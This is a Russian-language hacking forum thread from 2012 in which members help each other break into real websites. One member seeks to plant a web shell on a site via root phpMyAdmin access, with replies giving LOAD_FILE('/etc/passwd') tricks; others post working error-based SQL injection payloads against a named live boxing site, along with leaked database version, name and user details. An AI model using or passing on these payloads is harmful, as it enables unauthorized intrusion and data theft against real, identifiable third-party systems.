Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. xyetaxyeta

    xyetaxyeta Banned

    Joined:
    8 Mar 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
  2. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    кинь линк в пм. посмотрю
     
  3. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Зачем ссылку в ПМ? с этого IP нет доступа к MySQL. Он не сможет подключиться. Написано же что "can't connect..." :eek:
     
  4. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Врядли. Скорее, после нахождения слова весь запрос убивает.
     
  5. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Начнем сначала

    Итак я решил ясно расписать мою задачу на сегодняшний день. Поехали!

    ДАНО(как в школе:D): Некий русский сайт

    ЗАДАЧА: Залить шелл с любыми правами

    ДОСТУПЫ: Phpmyadmin(root); самодельная, на первый взгляд платная админка(Главный администратор)

    ПРИМЕЧАНИЯ: 1)Касаемо админки: кто хочет из интереса или же с целью помощи узнать её название пишите в ПМ, расскажу, покажу, но только на мой взгляд шансов 1-2%, так как панель истинно идиотская
    2)Касаемо phpmyadmin:
    Исправно работает команда INTO OUTFILE, криво работает команда LOAD_FILE, поясняю, при выполнении кода происходит вот такое в результате:
    PHP:
    SELECT LOAD_FILE('/etc/passwd')
    Результат:
    BLOB [2,2KB]
    Как мы видим, на выходе файл, экспортировать, прочитать невозможно. /etc/passwd взято как пример, с другими директориями работает так же.

    ОСЛОЖНЕНИЯ: До полного идиотизма ситуации добавляет то условие, что директории сайта закрыты для Create/Edit, то есть Errcode (13). Искал все возможные папки и все они оказались закрытые. Следовательно /homedir/site/html/ все три составляющие закрыты. Радовало только одно что хотя бы как минимум /var/ и /tmp/ открыты, но толку от них...

    РЕШЕНИЕ: Это я предоставляю вам, античатовцы :) Ваши идеи, предложения, ссылки с информацией, а самое главное ИСПРАВЛЕНИЙ я жду ниже или в ПМ

    PS: кто решит эту проблему того я назову королем заливания шеллов :D по крайней мере королем этого форума
     
  6. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Создай темповую таблицу. И результаты лоад файла записывай в нее
    PHP:
    UPDATE `tmpSET `column`=LOAD_FILE('/etc/passwd'WHERE `id`='1';
     
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    stan0009,
    вообще-то там есть доп. опции(в phpmyadmin), с помощью которых ты сможешь не записывая в таблицу результат запроса сразу смотреть.
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.gorodokboxing.com/news.php?cat=1'
    подскажите, как раскрутить.
     
    _________________________
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Не скулья.
     
  10. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Отвечаю всем)
    Isis
    уже такое пробовалось, я думал не тот запрос...
    тогда результат был таков:
    MySQL вернула пустой результат (т.е. ноль рядов)

    сейчас он, увы, такой же
    Ereee
    а можно поподробнее? точнее конкретнее. При экспорте, например, вылетает на главную страницу... Вы когда нибудь работали с этими опциями? кстати, версия 2.9.1.1.

    xcedz
    узнать бы еще как это понять). На бд висит еще несколько мини-сайтов. Если сайт является частью БД, то и такое возможно. А что? есть какие то способы?
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    faza02, софт говорит time-based. В жизни такое не крутил =)

    stan009, view result in HEX [снять галку] и т.д. Поищи, точно видел.
     
  12. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    дело дрянь видимо.
    галки нет, точнее, когда выполнил запрос ничего как BLOB и распечатать не дают.
    это при select
    при update пустое место, хоть ты убирай везде галки, хоть не убирай.
    запросами ничего не добьешься, доказано!
    делю вину своих рук и вину гребанного русифицированного phpmyadmin с такой же кривой админкой на пополам)

    xcedz напомню, что действие разворачивается в phpmyadmin и куда "плюсовать" пока что мне не постижимо. Пойду читать конфиги *okay*
     
  13. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    _http://www.gorodokboxing.com/news.php?cat=1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'

    5.0.77-log:kievboxing1_portal:[email protected]:redhat-linux-gnu
     
    #19713 er9j6@, 11 Mar 2012
    Last edited: 11 Mar 2012
    2 people like this.
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    er9j6@, читер :(
    я потерялся с выводом. как?
     
    _________________________
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Константами далеко не уйти, поэтому:
    Code:
    http://www.gorodokboxing.com/news.php?cat=1'and(select+1/**/from(select+count(*),concat((select+concat(table_name,0x00)/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by+x)a)and'
    P.S. Позор мне.
     
    1 person likes this.
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Ereee суровый, плюс после select решил не заменять на /**/ :D
    спасибо
     
    _________________________
    1 person likes this.
  17. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    хоть что-то получилось.
    load_file проканал. теперь как его использовать?
    PS: view in HEX опять не нашел)) отображается только часть тестового /etc/passwd.
     
  18. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    так как же залить шелл через load_file?
    нужен сам процесс.
    кстати я уже написал что доступной на запись диры нет, кроме var tmp итд.

    в чем заключается сейчас проблема. когда я выполнил запрос в таблицу test например load_file /etc/passwd то отображается не полный текст в таблице, а только первые 2-3 десятка символов. Как это исправить?
     
    #19718 stan0009, 11 Mar 2012
    Last edited: 11 Mar 2012
  19. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    там над выводом еесть кажется кнопочка +Option вроде так, вот в ней поставь галку на FULL text кажется так
     
    _________________________
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    stan0009, load_file() читает файл, через него залить нельзя.
    подскажите, через какую функцию в mysql сделать так, чтобы php-код из нее исполнялся?
     
    _________________________
Thread Status:
Not open for further replies.